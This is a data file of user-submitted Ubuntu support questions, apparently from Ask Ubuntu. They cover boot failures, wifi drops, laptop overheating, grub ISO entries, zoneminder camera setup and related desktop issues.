500288	looking for a simplified methods to add compute node	i have started up openstack icehouse on ubuntu 14.04 . all seems to be fine , now i am looking for a more simplified method to add another server to openstack that can compute and help with storage . any help is greatly appreciated .
500290	problem after ubuntu boots ! ! ! 14.04 lts 64 bit	i am using ubuntu 14.04 lts edition 64 bit . for the last few weeks , ubuntu is booting properly , after i enter the password ... everything goes black and it shows nothing at all . i do not know what to do . pls help ! !
500293	komodo edit does not show correct file association icons	the main problem which i 'm tring to resolve is that my komodo edit text editor all of a sudden began to show mathematica icon for every file ( yesterday i just had installed mathematica 10 ) . this is very annoying , and i will be very grateful to anyone who will be able to solve this . what i have found for now is that this is somehow related to the global settings , because when i forbid any access to a directory where mathematica is installed , that is komodo has no way to get an icon from this directory , but still shows it for every file . also i tried to remove the profile directory for komodo - no result . so the question is : does anyone know where komodo-edit or other program can get this icons ? they are not stored in its installation directory and the access to the mathematica directory is forbidden completely ( 000 ) . could anyone help me with this ? how can i get rid of these mathematica icons ? thank you .
500294	what does host % mean in command line ?	i see this a lot in terminal commands and did n't understand what does it mean . also the terminal does n't recognize it .
500295	booting ubuntu iso file from grub menu	i follow grub2 iso boot guide https : //help.ubuntu.com/community/grub2/isoboot here is my menu for iso booting menuentry `` ubuntu 14.04 live '' { set isofile= '' /lilw/os/ubuntu.iso '' loopback loop ( hd0,10 ) $ isofile linux ( loop ) /casper/vmlinuz.efi boot=casper iso-scan/filename= $ isofile noprompt noeject initrd ( loop ) /casper/initrd.lz } but i failed to boot from iso file , it always make my system reboot.no message giving out so i do n't know what happen . if i get into grub menu and then using command at grub > typing these follow command : grub > loopback loop ( hd0,10 ) /lilw/os/ubuntu.iso grub > linux ( loop ) /casper/vmlinuz.efi boot=casper iso-scan/filename= $ isofile noprompt noeject grub > initrd ( loop ) /casper/initrd.lz and then grub > boot it will boot to the iso normally . i do n't want to boot this way . but the menuentry in grub does not work . fyi : i have multiple version of ubuntu running on my system , range from 10.04 to the latest . my iso file store in sda10 which is a /home for the current ubuntu grub . edit 1 : i extract the contains of iso file but still ca n't boot with ubuntu . but i can boot with fedora 20 when extract it contains to a folder , weird.. edit 2 : finally i find a site that help out with new grub2 command syntax . all the failed boot is because of wrong syntax in grub2 try this : solved my problems http : //git.marmotte.net/git/glim/tree/grub2 so my grub menu entry will look like this : menuentry `` ubuntu 14.04 ( lts ) live desktop amd64 '' -- class ubuntu { set isoname= '' ubuntu-14.04-desktop-amd64.iso '' set isofile= '' /lilw/os/ $ { isoname } '' loopback loop ( hd0,10 ) $ isofile linux ( loop ) /casper/vmlinuz.efi boot=casper iso-scan/filename= $ { isofile } quiet splash initrd ( loop ) /casper/initrd.lz } if i missing the two ' { } ' of isofile it wo n't boot . so weird
500296	unity without compiz ( with xfwm4 instead )	can i run unity with a different window manager than compiz ? i 'd prefer xfwm4 . background story : i 'm running ubuntu 14.04 . i like unity - i especially like the part where besides the top bar i get the entire screen to myself . but i have a nvidia 8200m video card that i run at the lowest setting because it otherwise overheats and resets my laptop - but running it at normal speed does n't improve anything , so that 's irrelevant . in 12.04 i ran unity 2d , but i had replaced metacity ( the default window manager ) with xfwm4 , because metacity was also crawling* , while i always found xfwm4 lightning fast - and i even got compositing on without a performance penalty . *side story : when i could choose mist as the gtk rendering engine , i 'd switch to it for performance reasons . ever since gtk3 that is no longer available .
500298	diaganal lines during install	i am trying to install ubuntu 14.04 on an older amd 64 bit computer . about two minutes into the install i get diagonal lines across the screen and the computer freezes up and the installation quits . i suspect this to be a hardware/motherboard problem of some sort . however the computer will run windows xp without any issues whatsoever . i have tried both the 32 bit and 64 bit versions of ubuntu along with a few other distros and all of them produce the same result . any ideas ?
500302	'add to rhythmbox play queue ' nautilus plugin	i have been using windows for a long time . and now i have moved on to ubuntu . i am using ubuntu 14.04 lts . and , unity is my de . i like to have an option similar to 'enqueue in winamp ' whenever i right click an audio file . i googled for an answer . this site gave some idea to me . i came to know about the 'add to rhythmbox play queue ' nautilus plugin . i tried to add that plugin as directed by that site 's content . the following were my commands . sudo su sudo apt-get install python-nautilus wget http : //seemanta.net/code/nautilus_plugin/add-to-rhythmbox.py i got stuck up at my third command . the terminal displayed some errors . the following are those errors . . . resolving seemanta.net ( seemanta.net ) ... failed : name or service not known . wget : unable to resolve host address âseemanta.netâ i understand . my error statement clearly means that no server at www.seemanta.net is available now . so , where can i get that 'add to rhythmbox play queue ' nautilus plugin now ?
500303	laptop overheating problem in ubuntu 14.04	my laptop is a lenovo g480 ( 20157 ) and came with windows 8 pre-installed . i cleared it out and made ubuntu 14.04 ( lts ) my primary os . everything is awesome except the heating problem . my laptop burns like hell . i 've got indicator-cpufreq and tlp but i do n't think it 's making any difference because i feel my laptop fan is n't working . some relevant output : $ tlp-stat -t -- - tlp 0.5 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- +++ temperatures cpu temp = 64 [ °c ] /proc/acpi/ibm/fan = 0 [ /min ] $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +64.0°c ( crit = +88.0°c ) temp2 : +48.0°c ( crit = +126.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +65.0°c ( high = +72.0°c , crit = +90.0°c ) core 0 : +65.0°c ( high = +72.0°c , crit = +90.0°c ) core 1 : +61.0°c ( high = +72.0°c , crit = +90.0°c ) thinkpad-isa-0000 adapter : isa adapter fan1 : 0 rpm there was a file in /proc/acpi/ibm called fan before it was like : status : disabled speed : 0 level : 0 but i have now edited it to look like : status : enabled speed : 0 level : 7 commands : level < level > ( < level > is 0-7 , auto , disengaged , full-speed ) commands : enable , disable commands : watchdog < timeout > ( < timeout > is 0 ( off ) , 1-120 ( seconds ) ) the output of : - cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor is powersave i guess i can hear my fan running.. does anyone have any more suggestions ?
500310	wifi drops and reconnects with ubuntu 14.04 ( realtek rtl8188 )	i just installed ubuntu 14.04 lts on a toshiba satellite c655d . my wifi drops off occasionally , and all i have to do to reconnect is disable my wifi and enable wifi from the wireless icon in the top right . its just annoying . any help would be appreciated , i am new to ubuntu , but interested in learning the linux commands . luckily some commands are similar to dos and batch code . i use a router and have no issues with other wireless devices at the moment , including another laptop running 14.04 , but it is an older aspire one . here is the info from the wireless_script that i found on the forum : ======== wireless-info start ======== system-info ~~~~~~~~~~~~~~~~~~~~~~~~ satellite-c655d 3.13.0-32-generic x86_64 , ubuntu 14.04 lts , trusty cpu : amd c-50 processor memory : 2606 mb uptime : 11:38:53 up 2:59 , 2 users , load average : 0.53 , 0.67 , 0.69 lspci ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec:8176 ] ( rev 01 ) subsystem : realtek semiconductor co. , ltd. device [ 10ec:8181 ] kernel driver in use : rtl8192ce 06:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar8152 v1.1 fast ethernet [ 1969:2060 ] ( rev c1 ) subsystem : toshiba america info systems device [ 1179 : ff1e ] kernel driver in use : atl1c lsusb ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ bus 003 device 002 : id 10f1:1a34 importek bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 002 : id 046d : c06c logitech , inc. optical mouse bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub pcmcia card info ~~~~~~~~~~~~~~~~~~~ iwconfig ~~~~~~~~~~~~~~~~~~~~~~~~~~~ wlan0 ieee 802.11bgn essid : '' home '' mode : managed frequency:2.457 ghz access point : < mac c-01 home > bit rate=18 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=56/70 signal level=-54 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:90 missed beacon:0 rfkill ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ interface soft blocked hard blocked 0 : phy0 : wireless lan no no lsmod ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ rtl8192ce 53550 0 rtl_pci 26690 1 rtl8192ce rtlwifi 63475 2 rtl_pci , rtl8192ce rtl8192c_common 53172 1 rtl8192ce mac80211 630653 3 rtl_pci , rtlwifi , rtl8192ce cfg80211 484040 2 mac80211 , rtlwifi wmi 19177 1 toshiba_acpi module parameters ~~~~~~~~~~~~~~~~~~ cfg80211 ( 2 ) : cfg80211_disable_40mhz_24ghz=n | ieee80211_regdom=00 mac80211 ( 5 ) : beacon_loss_count=7 | ieee80211_default_rc_algo=minstrel_ht | max_nullfunc_tries=2 | max_probe_tries=5 | probe_wait_ms=500 rtl8192ce ( 5 ) : debug=0 | fwlps=y | ips=y | swenc=n | swlps=n wmi ( 2 ) : debug_dump_wdg=n | debug_event=n nm-tool ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ state : connected ( global ) ================o=============o===========o==============o=========o===========o==============o=========== interface & id | type | driver | state | default | speed | support | hw addr ================o=============o===========o==============o=========o===========o==============o=========== eth0 | wired | atl1c | unavailable | no | | | < mac eth0 > -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -+ -- -- -- -- -- -+ -- -- -- -- -- -- -- + -- -- -- -- -+ -- -- -- -- -- -+ -- -- -- -- -- -- -- + -- -- -- -- -- - wlan0 [ home ] | 802.11 wifi | rtl8192ce | connected | yes | 18 mb/s | wep/wpa/wpa2 | < mac wlan0 > mycharterwifia0-2g : infra , < mac c-na mycharterwifia0-2g 1 > , freq 2417 mhz , rate 54 mb/s , strength 40 wpa2 *home : infra , < mac c-01 home > , freq 2457 mhz , rate 54 mb/s , strength 66 notyours : infra , < mac c-02 notyours > , freq 2452 mhz , rate 54 mb/s , strength 20 wpa2 address : 192.168.1.121 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : removed dns : removed dns : removed -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -+ -- -- -- -- -- -+ -- -- -- -- -- -- -- + -- -- -- -- -+ -- -- -- -- -- -+ -- -- -- -- -- -- -- + -- -- -- -- -- - networkmanager.state ~~~~~~~~~~~~~~~ [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true networkmanager.conf ~~~~~~~~~~~~~~~~ [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false nm wifi profiles ~~~~~~~~~~~~~~~~~~~ home : ssid=home | mac-address= < mac wlan0 > | ipv6=auto | ipv4=auto interfaces ~~~~~~~~~~~~~~~~~~~~~~~~~ # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback resolv.conf ~~~~~~~~~~~~~~~~~~~~~~~~ nameserver 127.0.1.1 routes & ping ~~~~~~~~~~~~~~~~~~~~~~ kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 -- - 192.168.1.1 ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 1001ms rtt min/avg/max/mdev = 2.315/2.845/3.376/0.533 ms -- - 127.0.1.1 ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 999ms rtt min/avg/max/mdev = 0.088/0.088/0.088/0.000 ms iw reg get ~~~~~~~~~~~~~~~~~~~~~~~~~ ( region : `` en_us.utf-8 '' ) country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss iwlist chan ~~~~~~~~~~~~~~~~~~~~~~~~ wlan0 13 channels in total ; available frequencies : channel 01 ( 2.412 ghz ) - 13 ( 2.472 ghz ) current frequency:2.457 ghz ( channel 10 ) iwlist scan ~~~~~~~~~~~~~~~~~~~~~~~~ wlan0 scan completed : cell 01 - address : < mac c-01 home > channel:10 frequency:2.457 ghz ( channel 10 ) quality=54/70 signal level=-56 dbm encryption key : off essid : '' home '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=000000a88b1ceaa6 extra : last beacon : 84ms ago cell 02 - address : < mac c-02 notyours > channel:9 frequency:2.452 ghz ( channel 9 ) quality=24/70 signal level=-86 dbm encryption key : on essid : '' notyours '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=00000c380d063183 extra : last beacon : 368ms ago ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk blacklist ~~~~~~~~~~~~~~~~~~~~~~~~~~ [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci modinfo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [ rtl8192ce ] filename : /lib/modules/3.13.0-32-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192ce/rtl8192ce.ko firmware : rtlwifi/rtl8192cfwu_b.bin firmware : rtlwifi/rtl8192cfwu.bin firmware : rtlwifi/rtl8192cfw.bin srcversion : ef063698748457bbedb4633 depends : rtlwifi , rtl_pci , rtl8192c-common , mac80211 parm : swenc : set to 1 for software crypto ( default 0 ) parm : ips : set to 0 to not use link power save ( default 1 ) parm : swlps : set to 1 to use sw control power save ( default 0 ) parm : fwlps : set to 1 to use fw control power save ( default 1 ) parm : debug : set debug level ( 0-5 ) ( default 0 ) ( int ) [ rtl_pci ] filename : /lib/modules/3.13.0-32-generic/kernel/drivers/net/wireless/rtlwifi/rtl_pci.ko srcversion : d5e4890dc428fa5a1bf92df depends : mac80211 , rtlwifi [ rtlwifi ] filename : /lib/modules/3.13.0-32-generic/kernel/drivers/net/wireless/rtlwifi/rtlwifi.ko srcversion : e1f4663325225ee8dba54ca depends : mac80211 , cfg80211 [ rtl8192c_common ] filename : /lib/modules/3.13.0-32-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192c/rtl8192c-common.ko srcversion : 32f826c623bc49f764f7974 depends : [ mac80211 ] filename : /lib/modules/3.13.0-32-generic/kernel/net/mac80211/mac80211.ko srcversion : 8ada881d348148a3358334c depends : cfg80211 parm : max_nullfunc_tries : maximum nullfunc tx tries before disconnecting ( reason 4 ) . ( int ) parm : max_probe_tries : maximum probe tries before disconnecting ( reason 4 ) . ( int ) parm : beacon_loss_count : number of beacon intervals before we decide beacon was lost . ( int ) parm : probe_wait_ms : maximum time ( ms ) to wait for probe response before disconnecting ( reason 4 ) . ( int ) parm : ieee80211_default_rc_algo : default rate control algorithm for mac80211 to use ( charp ) [ cfg80211 ] filename : /lib/modules/3.13.0-32-generic/kernel/net/wireless/cfg80211.ko srcversion : e786d076b61f97809b04b64 depends : parm : ieee80211_regdom : ieee 802.11 regulatory domain code ( charp ) parm : cfg80211_disable_40mhz_24ghz : disable 40mhz support in the 2.4ghz band ( bool ) udev rules ~~~~~~~~~~~~~~~~~~~~~~~~~ # pci device 0x1969:0x2060 ( atl1c ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac eth0 > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x10ec:0x8176 ( rtl8192ce ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac wlan0 > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' custom files/entries ~~~~~~~~~~~~~~~ /etc/modules : default /etc/rc.local : default /etc/modprobe.d : not default /etc/pm/ ( cnf|pw|sl ) : default [ /etc/modprobe.d ] mlx4.conf : softdep mlx4_core post : mlx4_en kernel boot line ~~~~~~~~~~~~~~~~~~~ boot_image=/vmlinuz-3.13.0-32-generic root=/dev/mapper/ubuntu -- vg-root ro quiet splash vt.handoff=7 dmesg ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [ 2.226619 ] microcode : microcode update driver : v2.00 < tigran @ aivazian.fsnet.co.uk > , peter oruba [ 2.227831 ] audit : initializing netlink socket ( disabled ) [ 4.141892 ] psmouse serio1 : elantech : assuming hardware version 3 ( with firmware version 0x250f01 ) [ 13.317618 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 14.029316 ] wmi : mapper loaded [ 16.024516 ] rtl8192ce : using firmware rtlwifi/rtl8192cfw.bin [ 16.245437 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 16.246292 ] rtlwifi : wireless switch is on [ 21.829897 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 21.831623 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 24.389024 ] wlan0 : authenticate with < mac c-01 home > [ 24.410340 ] wlan0 : send auth to < mac c-01 home > ( try 1/3 ) [ 24.413577 ] wlan0 : authenticated [ 24.421609 ] wlan0 : associate with < mac c-01 home > ( try 1/3 ) [ 24.423984 ] wlan0 : rx assocresp from < mac c-01 home > ( capab=0x401 status=0 aid=8 ) [ 24.424197 ] wlan0 : associated [ 24.424263 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 24.428436 ] wlan0 : deauthenticating from < mac c-01 home > by local choice ( reason=2 ) [ 24.429155 ] wlan0 : authenticate with < mac c-01 home > [ 24.429441 ] wlan0 : send auth to < mac c-01 home > ( try 1/3 ) [ 24.431321 ] wlan0 : authenticated [ 24.437667 ] wlan0 : associate with < mac c-01 home > ( try 1/3 ) [ 24.440062 ] wlan0 : rx assocresp from < mac c-01 home > ( capab=0x401 status=0 aid=8 ) [ 24.440264 ] wlan0 : associated [ 34.446201 ] wlan0 : deauthenticating from < mac c-01 home > by local choice ( reason=3 ) [ 35.753724 ] wlan0 : authenticate with < mac c-01 home > [ 35.770004 ] wlan0 : send auth to < mac c-01 home > ( try 1/3 ) [ 35.771843 ] wlan0 : authenticated [ 35.774700 ] wlan0 : associate with < mac c-01 home > ( try 1/3 ) [ 35.777297 ] wlan0 : rx assocresp from < mac c-01 home > ( capab=0x401 status=0 aid=8 ) [ 35.777513 ] wlan0 : associated [ 643.559339 ] wlan0 : deauthenticated from < mac c-01 home > ( reason : 7 ) [ 643.598481 ] wlan0 : authenticate with < mac c-01 home > [ 643.598787 ] wlan0 : send auth to < mac c-01 home > ( try 1/3 ) [ 643.604888 ] wlan0 : authenticated [ 643.606162 ] wlan0 : associate with < mac c-01 home > ( try 1/3 ) [ 643.610387 ] wlan0 : rx assocresp from < mac c-01 home > ( capab=0x401 status=0 aid=8 ) [ 643.610641 ] wlan0 : associated [ 713.319037 ] wlan0 : deauthenticated from < mac c-01 home > ( reason : 7 ) [ 728.408563 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 738.592725 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 739.601499 ] wlan0 : authenticate with < mac c-01 home > [ 739.935776 ] wlan0 : send auth to < mac c-01 home > ( try 1/3 ) [ 740.038620 ] wlan0 : send auth to < mac c-01 home > ( try 2/3 ) [ 740.142648 ] wlan0 : send auth to < mac c-01 home > ( try 3/3 ) [ 740.246553 ] wlan0 : authentication with < mac c-01 home > timed out [ 741.192350 ] wlan0 : authenticate with < mac c-01 home > [ 741.201644 ] wlan0 : send auth to < mac c-01 home > ( try 1/3 ) [ 741.203327 ] wlan0 : authenticated [ 741.207022 ] wlan0 : associate with < mac c-01 home > ( try 1/3 ) [ 741.210702 ] wlan0 : rx assocresp from < mac c-01 home > ( capab=0x401 status=0 aid=8 ) [ 741.211034 ] wlan0 : associated [ 741.211120 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 1438.357303 ] wlan0 : deauthenticating from < mac c-01 home > by local choice ( reason=3 ) [ 1442.614329 ] rtlwifi : wireless switch is on [ 1446.371442 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 1447.389541 ] wlan0 : authenticate with < mac c-01 home > [ 1447.389841 ] wlan0 : send auth to < mac c-01 home > ( try 1/3 ) [ 1447.396790 ] wlan0 : authenticated [ 1447.400822 ] wlan0 : associate with < mac c-01 home > ( try 1/3 ) [ 1447.403732 ] wlan0 : rx assocresp from < mac c-01 home > ( capab=0x401 status=0 aid=7 ) [ 1447.403921 ] wlan0 : associated [ 1447.404002 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready ======== done ========
500312	share internet with samsung tab over samsung kies & cable	here is the problem : i need internet on my samsung galaxy tab 3 to update android , but wifi does n't work and my mobile data plan is not sufficient ( 1gb max ) . i want to `` reverse tether . '' i do n't have windows . i have tried all the apps . they all require root , which is precisely what i want to avoid since its how my tab 's wifi stopped working in the first place . here are the limiting factors : my laptop is running mint 17 ( ubuntu 14.04 ) no bluetooth on laptop wifi does n't work on my samsung tab ( question for another place ) all i have is my internet on my laptop . i am the owner of the pc so i can use sudo .
500313	retrieve files from ubuntu one filesync	i have received this mail from the ubuntu one team : '' this is the final reminder to make sure you have retrieved all your data from ubuntu one filesync , as we will be deleting all the content permanently on 31st july 2014 . after that date , we will no longer be able to retrieve any of your files . in order to make it easy for you to retrieve all of your content , we have released a new feature that lets you download all your content at once . our website ( https : //one.ubuntu.com/ ) has been updated with instructions on how to conveniently download all your files . in addition , you still can use mover.io 's offer to transfer your data to another cloud provider for free . the ubuntu one web interface is available for you to download individual files as well . all of us in the ubuntu one team would like to thank you for your support over the years . the ubuntu one team '' can anybody please clarify what this mail means ? and you do n't have to answer if you are not able to help ! ! ! ! just surf on . yours sincerely michael
500315	need good example of .vimrc file	i wanted to start using vim , and need to create .vimrc configuration file for it . where can i find some ready to use , good quality examples with described every option ?
500316	unable to boot 12.04	i have my hp probook 445 g1 ubuntu installed factory state . i was running out of boot space on my pc so i installed ubuntu-tweak to clean it.but it did n't worked . after that an error symbol is placed on top which says package has unmet dependencies . after that removed links from software update excluding the top four . after when i restarted my pc it got stuck on purple screen . what to do now ? ? ? ? ? ? plz help me i have lot of saved in there how to boot my pc now i tried boot-repair but it did n't work here is the log file plzz help me www.paste.ubuntu.com/7825054/
500318	how to install vivotek fd6122 ip videocamera in zoneminder ?	problem : when in zoneminder ( version used:1.27.1 ) in the settings of your monitor , voice source tab as follows : remote protocol : http remote method : simple remote host name : root : miapassword @ 192.168.x.y remote host port : 8088 remote host path : /cgi-bin/video.jpg target colorspace : 24 bit color capture width ( pixels ) : 320 capture height ( pixels ) : 240 but does not want to operate with a blue screen ! info and note : i 'm asking for help to install a vivotek fd6122 ip camera ( manual at page 62 url syntax : `` http : ///cgi-bin/video.jpg '' ) the camera works perfectly . when i run its browser access : 192.168.xy : 8088/cgi-bin/video.jpg , it asks me : user : root password : miapassword and i see the camera on quietly browser . the vivotek camera also works great from web administration panel ( http : //192.168.xy:8088/snapshot.vspx ) and android phone . the behavior of browsers not working only in the vivotek , only on firefox by directly entering username and password ( method working on other ip cameras ) root : miapassword @ 192.168.x.y:8088/cgi-bin/video.jpg zoneminder does not like username and password to be empty . it is advisable to always use these two data otherwise , as happened in the other camera ip , does not display and shows the usual blue screen with timer and date working ! as soon as i entered username and password the other ip camera `` magically '' worked however , except for the `` squeamish '' vivotek fd6122 ! i did not find the model here vivotek in zoneminder . i tried the settings for the similar model ( vivotek fd8134 ) at the site of zoneminder recommended settings zoneminder ( vivotek fd8134 ) : remote protocol : rtsp remote method : rtp/rtsp remote host name : put in the cameras ip or hostname remote host path : /live.sdp and both zoneminder , both from the browser , but without success in both cases . log files of the three errors are repeated continuously : **date/time , component , pid , level , message , file , line** 2014-07-22 17:46:10.632456 zmc_m3 3574 err failed requesting writeable buffer for reading jpeg image . zm_image.cpp 993 2014-07-22 17:46:10.597513 zmc_m3 3574 err held buffer is undersized for requested buffer zm_image.cpp 314 2014-07-22 17:46:10.222009 zmc_m3 3574 err unable to decode jpeg zm_remote_camera_http.cpp 1120
500321	log or view log of all usb operations	if i want to see the log of all the usb devices that were connected to my machine is this feature already built in , if not is there a way to do so . furthermore , what if alongside i also want to know what files were read & or written to usb devices on a particular machine .
500322	issue with login page	recently i noticed there is a issue with the login screen . scenario is like this , i was watching a youtube video using firefox in full screen , then i paused the video for a period of time . when i back , assuming the screen got locked however , i could not able to view login screen , then i just typed my password and i 'm able to start watching the video . not sure its an issue with browser or os . regards , josmon thomas
500327	aladdin etoken install issue on ubuntu 14.04	has anyone been able to get aladdin etoken to work on ubuntu 14.04 64-bit . could someone provide the steps for same .
500328	sublime opens files opened by root on startup	i have installed sublime according to tutorial from here http : //www.technoreply.com/how-to-install-sublime-text-2-on-ubuntu-12-04-unity/ now i have a problem with sublime not remembering files from previous session unless previous session was started by sudo sublime i have checked hot_exit and remember_open_files and they are both set to true any idea ?
500332	apt-get-install : error	while i trying install : sudo apt-get install ubuntu-tweak then error is : var/lib/apt/list/in.archive.ubuntu.com_ubuntu_dist_trusty_universe_i18n_translation-en package not opened or parsed . on ubuntu 14.04 lts how do i remove or repair it ?
500335	wireless is not working	wireless says disabled , and there are no drivers on the update page . what can i do ? ps ethernet connection works great
500337	an extra line appears on the leftmost point of additional display . how do i fix it ?	i have a screen which i attach to my laptop . when i use the `` extend '' mode , one column of pixels at the right end of the left display screen creeps up to the leftmost part of my right display . its really annoying , particularly when i am watching movies etc . is there a way to fix this ?
500340	error in loading of ubuntu 14.04 installation dvd	so , it gets to the screen of ubuntu where it 's loading , i click left button to see code and here 's what it says is happening : stdin : not a typewriter generating locales ... en_us.utf-8 ... done generation complete . chroot : ca n't execute 'glib-compile-schemas ' : input/output error chroot : ca n't execute '/usr/lib/user-setup/user-setup-apply ' : input/output error install : invalid user 'ubuntu' install : invalid user 'ubuntu' using cd-rom mount point /cdrom/ identifying ... [ bac8495d27ebe9f23250907977f69e73-2 ] scanning disc for index files ... found 2 package indexes , 0 source indexes , 0 translation indexes and 1 signatures found label 'ubuntu 14.04 lts _trusty tahr_ - release amd64 ( 20140417 ) ' this disc is called : 'ubuntu 14.04 lts _trusty tahr_ - release amd64 ( 20140417 ) ' copying package lists ... gpgv : signature made thu apr 17 01:35:09 2014 utc using dsa key id fbb75451 gpgv : good signature from `` ubuntu cd image automatic signing ket < cdimage @ ubuntu.com > '' reading package indexes ... done writing new source list source list entries for this disc are : deb cdrom : [ ubuntu 14.04 lts _trusty tahr_ - release amd64 ( 20140417 ) ] /trusty main restricted repeat this process for the rest of the cds in your set ... *starting mount filesystem on boot [ ok ] *starting signal sysvinit that the rootfs is mounted [ ok ] *starting populate and link to /run filesystem [ ok ] *stopping track if upstart is running in a container [ ok ] *starting mount filesystem on boot [ fail ] *stopping mount filesystem on boot [ ok ] then there 's a lot of things that happen in one second and i could n't write it down and it sends me to a screen that says : general error mounting filesystems a maintenance shell will now be started control-d will terminate this shell and reboot the system thanks in advance ! ( sorry if there 's any mispelling , i translated it from handwriting . and by the way i 'm not from usa , i do n't know why it says `` en_us.utf-8 ... done '' , and the time marked in the signature seems to be also from the usa )
500342	modemmanager dont find android phone as modem	are connection possible ? android phone in `` usb tethering '' mode . mmcli -l output : no modems were found dmesg|tail output : [ 83189.182093 ] usb 2-1.2 : usb disconnect , device number 18 [ 83189.386728 ] usb 2-1.2 : new high-speed usb device number 19 using ehci-pci [ 83189.481284 ] usb 2-1.2 : new usb device found , idvendor=1004 , idproduct=61da [ 83189.481294 ] usb 2-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 83189.481300 ] usb 2-1.2 : product : lge usb device [ 83189.481304 ] usb 2-1.2 : manufacturer : lg electronics inc. [ 83189.481309 ] usb 2-1.2 : serialnumber : 0000000000000000 [ 83189.486186 ] rndis_host 2-1.2:1.0 usb0 : register 'rndis_host ' at usb-0000:00:1d.0-1.2 , rndis device , 6a : ed:00:00:00:00 lsusb | grep lg output : bus 002 device 019 : id 1004:61da lg electronics , inc .
500350	busy mouse on dock after opening text files	when opening text files ( via double-click ) from nautilus , i noticed some strange behavior . while the text editor is opening the file , the nautilus window shows the `` busy '' cursor — and so does the unity dock/dash . this lasts for a few seconds for sublime text 3 , and one second for gedit . i can detect no disk drive activity for the majority of this time . any idea why the unity dock would appear busy when a file is being opened between two other applications ?
500351	configuration changes disappear after kernel updates	i recently upgraded to ubuntu 14.04 and have had to make a few configuration changes . specifically , i fixed the ro/rw issue in grub.cfg and added more swap space , both times making edits using gksudo . these changes remained in force after an ordinary reboot but disappeared after a kernel update . ( interestingly , the change i made to swappiness , which did not use gksudo , has remained in force . ) this has happened twice now . what 's going on and how do i make my changes survive kernel updates ?
